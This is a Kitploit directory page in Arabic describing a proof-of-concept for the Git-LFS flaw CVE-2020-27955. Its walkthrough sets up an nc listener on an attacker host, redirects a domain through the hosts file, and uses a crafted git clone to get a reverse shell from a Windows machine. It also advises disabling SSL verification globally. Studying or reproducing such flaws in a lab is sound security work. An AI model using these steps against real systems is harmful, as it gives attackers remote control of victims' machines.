Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-27955 — استغلال إثبات المفهوم لـ CVE-2020-27955 في Git-LFS، يوضح تنفيذ التعليمات البرمجية عن بُعد عبر عملية git clone معدّة للحصول على شلّة عكسية. | Kitploit
أدوات/GitHubGitHub/z50913/cve-2020-27955
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةاختبار الاختراقالقيادة والسيطرة
GitHubz50913/cve-2020-27955

CVE-2020-27955

استغلال إثبات المفهوم لـ CVE-2020-27955 في Git-LFS، يوضح تنفيذ التعليمات البرمجية عن بُعد عبر عملية git clone معدّة للحصول على شلّة عكسية.

عرض المستودع
منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إعادة إنتاج ثغرة CVE-2020-27955

  1. قم بتنزيل إصدار Git-LFS المعرض للثغرة على جهاز ويندوز

رابط التحميل: https://github.com/git-for-windows/git/releases/tag/v2.29.2.windows.1

  1. قم بالتثبيت على جهاز ويندوز، ثم أضف المعلومات التالية إلى ملف hosts. 10.1.1.5 هو المضيف الذي يستمع على المنفذ 8888 عبر nc (يمكنك استبداله).

10.1.1.5 abcall.xyz

  1. على المضيف 10.1.1.5، ابدأ الاستماع على المنفذ 8888 باستخدام nc

┌──(root㉿hostname)-[~]

└─# nc

Cmd line: -l -p 8888

  1. في موجه الأوامر على جهاز ويندوز، أدخل الأمر التالي:

git clone https://github.com/z50913/CVE-2020-27955.git

  1. ستحصل على شل موجه الأوامر لجهاز ويندوز على 10.1.1.5

أخرى

إذا واجهت مشكلة في شهادة SSL، يمكنك أولاً إدخال الأمر التالي لتعطيل التحقق من SSL، ثم إعادة تنفيذ clone:

git config --global http.sslverify false

تنزيل الأداة